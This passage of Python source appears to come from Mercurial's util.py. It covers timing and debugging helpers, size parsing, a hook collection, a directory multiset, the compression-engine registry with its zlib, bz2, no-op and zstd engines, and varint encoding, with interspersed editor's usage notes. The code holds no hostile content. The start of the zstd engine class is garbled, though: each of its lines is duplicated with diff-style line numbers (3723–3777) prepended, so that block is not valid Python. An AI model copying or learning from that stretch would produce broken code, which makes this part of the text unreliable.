        timedcm._nested -= 1

timedcm._nested = 0

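# Editor's note: an illustrative use of timedcm, not part of util.py;
# 'do_expensive_work' is hypothetical.
#
#   with timedcm('loading %s', b'manifest') as stats:
#       do_expensive_work()
#   # stats.elapsed now holds the duration in seconds, and bytes(stats)
#   # renders it via timecount(), e.g. '12.30 ms'.
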
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write('%s%s: %s\n' % (
            ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
            time_stats))
        return result
    return wrapper

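# Editor's note (not part of util.py): given the wrapper above, a decorated
# function writes one line per call to stderr, indented two spaces per
# nesting level, e.g. a top-level call taking ~1.2 milliseconds would print
# something like:
#
#     foo: 1.23 ms
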
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

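# Editor's note: illustrative usage of the hooks class, not part of util.py.
#
#   h = hooks()
#   h.add(b'b-ext', lambda x: x + 1)
#   h.add(b'a-ext', lambda x: x * 2)
#   h(3)  -> [6, 4]   # b'a-ext' sorts first, so its hook runs first
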
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

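# Editor's note: illustrative usage, not part of util.py. While debugging,
# drop a one-off call into the code under investigation:
#
#   debugstacktrace(b'entering merge', depth=3)
#
# which writes 'entering merge at:' plus the three innermost frames to stderr.
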
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

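# Editor's note: illustrative example of the dirs multiset, not part of
# util.py (and note the C implementation from parsers may be substituted
# just above).
#
#   d = dirs([b'a/b/c', b'a/b/d', b'e/f'])
#   b'a/b' in d   -> True
#   d.delpath(b'a/b/c')
#   d.delpath(b'a/b/d')
#   b'a/b' in d   -> False (no remaining path lives under a/b)
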
def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

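# Editor's note: illustrative example, not part of util.py.
#
#   list(finddirs(b'a/b/c'))  -> [b'a/b', b'a']
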
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

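# Editor's note: illustrative usage of the global manager, not part of
# util.py. The zlib engine queried here is registered further down in this
# module.
#
#   engine = compengines.forbundlename(b'gzip')
#   compressed = b''.join(engine.compressstream([b'chunk1', b'chunk2']))
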
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``StorageError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

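# Editor's note: a minimal sketch of a new engine, not part of util.py.
# 'identity' is a hypothetical name; a real engine would normally also
# declare bundletype(), wireprotosupport() or revlogheader() so that it is
# reachable from one of the lookup tables above.
#
#   class _identityengine(compressionengine):
#       def name(self):
#           return 'identity'
#       def compressstream(self, it, opts=None):
#           return it
#       def decompressorreader(self, fh):
#           return fh
#
#   compengines.register(_identityengine())
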
class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except self._zstd.ZstdError:
            self._eof = True

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

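# Editor's note: illustrative usage of the revlog compressor API, not part
# of util.py.
#
#   c = compengines['zlib'].revlogcompressor()
#   c.compress(b'x' * 100)   # -> compressed bytes, or None if not smaller
#   c.compress(b'tiny')      # -> None (inputs under 44 bytes are skipped)
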
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

3723 class _zstdengine(compressionengine):
3724 class _zstdengine(compressionengine):
3724 def name(self):
3725 def name(self):
3725 return 'zstd'
3726 return 'zstd'
3726
3727
3727 @propertycache
3728 @propertycache
3728 def _module(self):
3729 def _module(self):
3729 # Not all installs have the zstd module available. So defer importing
3730 # Not all installs have the zstd module available. So defer importing
3730 # until first access.
3731 # until first access.
3731 try:
3732 try:
3732 from . import zstd
3733 from . import zstd
3733 # Force delayed import.
3734 # Force delayed import.
3734 zstd.__version__
3735 zstd.__version__
3735 return zstd
3736 return zstd
3736 except ImportError:
3737 except ImportError:
3737 return None
3738 return None
3738
3739
3739 def available(self):
3740 def available(self):
3740 return bool(self._module)
3741 return bool(self._module)
3741
3742
3742 def bundletype(self):
3743 def bundletype(self):
3743 """A modern compression algorithm that is fast and highly flexible.
3744 """A modern compression algorithm that is fast and highly flexible.
3744
3745
3745 Only supported by Mercurial 4.1 and newer clients.
3746 Only supported by Mercurial 4.1 and newer clients.
3746
3747
3747 With the default settings, zstd compression is both faster and yields
3748 With the default settings, zstd compression is both faster and yields
3748 better compression than ``gzip``. It also frequently yields better
3749 better compression than ``gzip``. It also frequently yields better
3749 compression than ``bzip2`` while operating at much higher speeds.
3750 compression than ``bzip2`` while operating at much higher speeds.
3750
3751
3751 If this engine is available and backwards compatibility is not a
3752 If this engine is available and backwards compatibility is not a
3752 concern, it is likely the best available engine.
3753 concern, it is likely the best available engine.
3753 """
3754 """
3754 return 'zstd', 'ZS'
3755 return 'zstd', 'ZS'
3755
3756
3756 def wireprotosupport(self):
3757 def wireprotosupport(self):
3757 return compewireprotosupport('zstd', 50, 50)
3758 return compewireprotosupport('zstd', 50, 50)
3758
3759
3759 def revlogheader(self):
3760 def revlogheader(self):
3760 return '\x28'
3761 return '\x28'
3761
3762
3762 def compressstream(self, it, opts=None):
3763 def compressstream(self, it, opts=None):
3763 opts = opts or {}
3764 opts = opts or {}
3764 # zstd level 3 is almost always significantly faster than zlib
3765 # zstd level 3 is almost always significantly faster than zlib
3765 # while providing no worse compression. It strikes a good balance
3766 # while providing no worse compression. It strikes a good balance
3766 # between speed and compression.
3767 # between speed and compression.
3767 level = opts.get('level', 3)
3768 level = opts.get('level', 3)
3768
3769
3769 zstd = self._module
3770 zstd = self._module
3770 z = zstd.ZstdCompressor(level=level).compressobj()
3771 z = zstd.ZstdCompressor(level=level).compressobj()
3771 for chunk in it:
3772 for chunk in it:
3772 data = z.compress(chunk)
3773 data = z.compress(chunk)
3773 if data:
3774 if data:
3774 yield data
3775 yield data
3775
3776
3776 yield z.flush()
3777 yield z.flush()
3777
3778
    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

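        # Size regimes above, summarized (illustrative comment, not from the
        # original source): inputs under 50 bytes are unlikely to shrink past
        # the frame overhead, so they are stored uncompressed (None); inputs
        # up to 1 MB are compressed in one shot; larger inputs are fed
        # through a compressobj() in recommended-size slices to bound memory
        # use. In every case a None return means "store uncompressed".
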
        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
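
# Illustrative usage sketch (not part of the original module): once the
# engine is registered, revlog code can obtain a compressor through it.
# compress() returns None whenever storing the input uncompressed is the
# better choice, so callers must handle that case:
#
#   engine = compengines['zstd']
#   if engine.available():
#       c = engine.revlogcompressor({'level': 3})
#       blob = c.compress(b'x' * 1000)   # compressed bytes, or None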

def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = b'``%s``\n    %s' % (bt[0], pycompat.getdoc(engine.bundletype))

        value = docobject()
        value.__doc__ = pycompat.sysstr(doc)
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()
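
# Illustrative note (assumption, not from the original source): each value in
# the dict built above carries a reST-style docstring of the form
#
#   ``zstd``
#       A modern compression algorithm that is fast and highly flexible.
#       ...
#
# which the help system can render into the bundle compression topic, while
# _origdoc/_origfunc keep the untranslated originals for i18n extraction.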

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

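# Illustrative example (not part of the original module): with f=b'foo' and
# tag=b'orig', safename() first proposes b'foo~orig'; if that name already
# exists in ctx or in others, it falls back to b'foo~orig~1', b'foo~orig~2',
# and so on until a free name is found:
#
#   safename(b'foo', b'orig', ctx, others={b'foo~orig'})
#   # -> b'foo~orig~1'  (assuming neither name exists in ctx)
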
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

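# Illustrative contrast (not part of the original module): a plain
# stream.read(n) may legally return fewer than n bytes, while readexactly()
# turns a short read into a hard error:
#
#   readexactly(bytesio(b'ab'), 2)   # -> b'ab'
#   readexactly(bytesio(b'ab'), 3)   # raises error.Abort
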
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

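# Worked example (illustrative, not part of the original module): 1337 is
# 0b10100111001. Splitting into 7-bit groups from the least significant end
# gives 0b0111001 (0x39) and 0b0001010 (0x0a). Every group but the last gets
# the continuation bit, so the encoding is chr(0x39 | 0x80) + chr(0x0a) =
# '\xb9\n', matching the doctest above.
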
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
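
# Round-trip sketch (illustrative, not part of the original module): the
# decoder accepts anything with a .read(N) method, so an in-memory stream
# works:
#
#   uvarintdecodestream(bytesio(uvarintencode(65536)))   # -> 65536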